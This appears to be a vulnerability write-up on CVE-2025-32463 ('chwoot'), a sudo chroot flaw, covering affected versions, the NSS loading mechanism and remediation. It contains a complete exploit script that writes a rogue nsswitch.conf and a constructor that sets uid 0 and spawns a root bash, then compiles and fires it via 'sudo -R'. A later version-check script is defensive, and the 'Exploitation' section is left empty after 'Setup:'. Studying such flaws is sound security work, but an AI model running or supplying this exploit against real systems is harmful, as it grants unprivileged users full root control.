CVE-2025-32463


Affected versions

The vulnerability affects sudo 1.9.14 through 1.9.17 inclusive. It was fixed in 1.9.17p1, so 1.9.17p1 and later are not affected; releases before 1.9.14 are not affected either, because the vulnerable chroot handling was introduced in 1.9.14.


The conditions for exploitation are:

  • the sudo version is between 1.9.14 and 1.9.17 (inclusive)

  • a local, unprivileged user can execute the sudo binary; no sudoers rule is required, not even one granting chroot, because sudo enters the user-supplied -R directory while resolving the command, before the sudoers policy has decided whether the user may use it (the default configuration is vulnerable)

  • the user controls a directory to use as the chroot (a world-writable location such as /tmp is enough)


Introduction and background

CVE-2025-32463, nicknamed "chwoot", is a critical vulnerability (CVSS 9.3) in sudo. Sudo is the standard tool on Linux and other Unix-like systems for letting users run commands with elevated (typically root) privileges, which makes it a central piece of the local security boundary.

The problem lies in how sudo handles chroot. The chroot option (sudo -R directory, or --chroot=directory) runs the command with a different directory as its root. For more information, see the Arch wiki documentation.


nsswitch.conf

Inside the sudoers plugin, the chroot is set up by pivot_root() and torn down by unpivot_root(). Between those two calls sudo, still running as root, resolves the command path and performs user and group lookups through the Name Service Switch (NSS). glibc reads /etc/nsswitch.conf relative to the root in effect at that moment, which is the user-supplied directory, so the attacker decides which NSS sources are used; the shared objects those sources name are then loaded into the root-privileged sudo process and run outside the confinement of that directory.

The nsswitch.conf format works like this:

First, a database is named (passwd, group, and so on). Then the sources for that database are listed in lookup order (files, systemd, and so on).

passwd:         files systemd
group:          files systemd
shadow:         files
gshadow:        files    

When a database is queried, glibc loads a shared object for each source it names, libnss_<source>.so.2. Which nsswitch.conf gets consulted depends on the root in effect when the file is first read (here, the chroot), and glibc caches that configuration for the lifetime of the process; the shared object it names is therefore loaded into the sudo process and its code runs with root privileges and, once the chroot has been undone, with the real system root. Because the library name is built directly from the source string, a source such as /woot1337 (the name used by the public PoC) becomes libnss_/woot1337.so.2, and a name containing a slash is treated by the dynamic loader as a path to open rather than a library to search for in the standard directories, so the attacker can point it at a file they wrote.
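The following script is an added example written for this page; it is neither the PoC from the repository referenced below nor code from the sudo project. It shows the two things the paragraph above describes: how an NSS source name turns into a shared-object name (and why a slash in it is dangerous), and what the attacker-controlled root has to contain for sudo to pick it up. The directory names woot and libnss_, the source name /woot1337, the copied /etc/group and the constructor body are assumptions modelled on the public PoC; the library directory sits beside the chroot rather than inside it because the slash-containing name is opened relative to sudo's working directory. Staging only writes files; the compile-and-run step is separate and belongs in a throwaway lab VM.

```shell
#!/bin/sh
# Added example (editorial, not the page's PoC or sudo's code): lay out the
# attacker-controlled root that drives the nsswitch.conf confusion in
# CVE-2025-32463. Names below (woot, libnss_, /woot1337) are assumptions
# modelled on the public PoC.

# Map an nsswitch.conf source name to the shared object glibc will dlopen.
# glibc builds "libnss_<source>.so.2"; a source containing '/' therefore
# becomes a *path*, which the loader opens directly instead of searching the
# standard library directories.
nss_lib_name() {
    printf 'libnss_%s.so.2\n' "$1"
}

# True (0) when a source name would be resolved as a path: the dangerous case.
nss_source_is_path() {
    case "$1" in
        */*) return 0 ;;
        *)   return 1 ;;
    esac
}

# Create the staging tree under $1:
#   $1/woot/etc/nsswitch.conf  read by glibc while sudo is chrooted into woot
#   $1/woot/etc/group          copied so group lookups inside the chroot succeed
#   $1/woot1337.c              source of the module, built into $1/libnss_/woot1337.so.2
stage_chwoot_lab() {
    stage="$1"
    mkdir -p "$stage/woot/etc" "$stage/libnss_"
    # Only the passwd database is redirected; everything else keeps its default.
    printf 'passwd: /woot1337\n' > "$stage/woot/etc/nsswitch.conf"
    if [ -r /etc/group ]; then cp /etc/group "$stage/woot/etc/group"; fi
    cat > "$stage/woot1337.c" <<'EOF'
#include <stdlib.h>
#include <unistd.h>
/* Assumed constructor body: runs as soon as the object is mapped into the
 * root-owned sudo process, before any NSS function is ever called. */
__attribute__((constructor)) void woot(void)
{
    setreuid(0, 0);
    setregid(0, 0);
    chdir("/");
    execl("/bin/bash", "/bin/bash", (char *)NULL);
}
EOF
}

# Compile the module and trigger the lookup. Lab VM only: this is the exploit.
# The command argument to sudo need not exist; the module loads during sudo's
# own lookups, before the command would be run.
run_chwoot_lab() {
    stage="$1"
    gcc -shared -fPIC -o "$stage/$(nss_lib_name /woot1337)" "$stage/woot1337.c"
    ( cd "$stage" && sudo -R woot woot )
}

# Sourcing or running this file without arguments only defines the functions;
# `sh thisfile.sh run` stages and fires the lab.
case "${1:-}" in
    run)
        stage=$(mktemp -d /tmp/chwoot.XXXXXX)
        stage_chwoot_lab "$stage"
        run_chwoot_lab "$stage"
        ;;
esac
```

The same mapping explains the detection angle: any nsswitch.conf under a user-writable directory whose source field contains a slash, or any file named libnss_*.so.2 outside the system library directories, is a strong indicator of an attempt against this bug.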



Exploitation

For the exploitation of this CVE, we'll use this GitHub repository, which contains a ready-made PoC and a vulnerable Docker image to test it against.


The direct exploitation is pretty simple.

Setup:



Remediation

Update sudo to 1.9.17p1 or later. Downgrading below 1.9.14 also avoids this bug, but it reintroduces every issue fixed since, so it is not a real option. Distributions often backport the fix without changing the upstream version number, so on a packaged system check the vendor advisory or the package changelog rather than relying on the version string alone.
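A quick triage helper, added here as an example and not taken from the page or from sudo: it parses a sudo version string (major.minor.patch with an optional pN suffix, the format sudo --version prints) into a comparable number and reports whether it falls inside the 1.9.14 to 1.9.17 range, i.e. below the 1.9.17p1 fix. The sed pattern for the first line of sudo --version is an assumption about its output format; beta suffixes such as b1 are not handled.

```shell
#!/bin/sh
# Added example (editorial): is this sudo version in the CVE-2025-32463 range?
# Vulnerable: 1.9.14 .. 1.9.17 inclusive. Fixed: 1.9.17p1.

# Turn "MAJOR.MINOR.PATCH[pLEVEL]" into a sortable integer:
#   MAJOR*1000000 + MINOR*10000 + PATCH*100 + LEVEL
# e.g. 1.9.17p1 -> 1091701, 1.9.17 -> 1091700, 1.9.14 -> 1091400
sudo_version_key() {
    v="$1"
    major=${v%%.*}; rest=${v#*.}
    minor=${rest%%.*}; rest=${rest#*.}
    patch=${rest%%p*}
    case "$rest" in
        *p*) plevel=${rest#*p} ;;
        *)   plevel=0 ;;
    esac
    echo $(( major * 1000000 + minor * 10000 + patch * 100 + plevel ))
}

# Returns 0 (true) when the version is within the vulnerable range.
sudo_chwoot_vulnerable() {
    key=$(sudo_version_key "$1")
    lo=$(sudo_version_key 1.9.14)
    fix=$(sudo_version_key 1.9.17p1)
    [ "$key" -ge "$lo" ] && [ "$key" -lt "$fix" ]
}

# Extract the version from the first line of `sudo --version`
# (assumed format: "Sudo version 1.9.17p1"). Prints nothing if sudo is absent.
sudo_installed_version() {
    sudo --version 2>/dev/null | sed -n '1s/^Sudo version \([0-9][0-9.p]*\).*/\1/p'
}

# Stand-alone use: report on the sudo found in PATH, if any.
if v=$(sudo_installed_version) && [ -n "$v" ]; then
    if sudo_chwoot_vulnerable "$v"; then
        echo "sudo $v: inside the CVE-2025-32463 range; confirm whether the vendor backported the fix"
    else
        echo "sudo $v: outside the affected range"
    fi
fi
```

The version check is only the first step: because distributions backport fixes, a "vulnerable" result on a packaged sudo means "go and read the package changelog", not "exploitable".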



